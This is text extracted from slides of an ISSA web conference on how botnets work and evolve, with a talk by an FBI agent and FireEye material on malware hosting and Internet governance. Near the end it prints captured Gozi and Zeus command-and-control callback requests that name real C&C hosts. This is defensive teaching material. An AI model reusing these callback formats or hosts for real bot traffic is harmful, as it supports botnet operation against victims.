Beruflich Dokumente
Kultur Dokumente
Sponsored by:
Phillip H Griffin
Member - ISSA Educational Advisory Council, Web Conferences Committee
Agenda
How Botnets Have Evolved
Chris Calderon - Special Agent, FBI
Closing Comments
UNCLASSIFIED
UNCLASSIFIED
Agenda
What is a botnet? How are botnets created? Why are botnets created? Basic structure of a botnet Taking down a botnet How botnets are evolving Botnets in the news Questions
UNCLASSIFIED
UNCLASSIFIED
What is a botnet?
A network of compromised computers (robots/bots) Controlled by a bot master / herder Used to carry out various illegal activities Services are often sold to other criminal elements
UNCLASSIFIED
UNCLASSIFIED
Malware loaded onto victim machines Victims Done through exploits and/or social engineering Continually update software / instructions to bots Manage Maintain statistics for the botnet
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Basic Structure
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Botnets evolving
Proxy
C&C Server Bot Master / Herder C&C Server Proxy
Victim
Victim Victim
Proxy
Victim
UNCLASSIFIED
UNCLASSIFIED
Botnets evolving
Proxy Proxy Bot Master / Herder Proxy C&C Server C&C Victim
Server
Proxy
Victim
Victim Proxy Victim
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Questions?
UNCLASSIFIED
Todays Agenda
Understanding the shift from conventional to modern malware, and the resultant hosting needs
Port scanning, high windows port activity, non-http over port 80, non-web traffic, etc.
3
19
4
20
21
21
Callback Server
Other gateway
List-based, signatures
Desktop antivirus
Losing the threat arms race
22
22
23
Who controls the Internet? ICANN? IANA? CERTs? USCYBERCOM? Tier 1 ISPs?
Depends who you ask and how big a stink you make.
24
25
IANA RIRs
RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC
RIRs LIRs
LIRs are generally data centers and ISPs
26
27
28
29
ICANNt do anything!
ICANN and the RIRs simply sign contracts. They have no regulatory authority whatsoever, presuming that the Registrar doesnt violate the contract. These contracts have no mention of content.
Recent success against EstDomains was due to them having a convicted felon as an Officer of the company.
Large pushback when someone even suspects they are trying to take an authoritative stance on something.
30
31
32
Gozi
POST /cgi-bin/forms.cgi HTTP/1.0 Content-Type: multipart/form-data; boundary=-------------------------139b9b3139b9b3139b9b3 User-Agent: IE Host: 91.216.215.130 Content-Length: 453 Pragma: no-cache
19 35
Zeus
POST /xed/gate.php HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF) Host: schastlivieiveselierebyta0001.com Content-Length: 329 Connection: Keep-Alive Cache-Control: no-cache
GET /maincp/gate.php?guid=user2!ND93103!893CND1 &ver=10280&stat=ONLINE&cpu=0&ccrc=A91024N&md5=3fabd889 712214bdbee8381337 HTTP/1.0 User-Agent: Microsoft Internet Explorer Host: www.promohru.in Pragma: no-cache
22 38
www.fireeye.com
For late-breaking malware research and news:
blog.fireeye.com
41
FireEye, Inc. Confidential 41
42
Closing Remarks
Thank you to FireEye for their support of ISSA and this Web Conference
CPE Credit
Within 24 hours of the conclusion of this webcast, you will receive a link to a post Web Conference quiz.
After the successful completion of the quiz you will be given an opportunity to PRINT a certificate of attendance to use for the submission of CPE credits.
44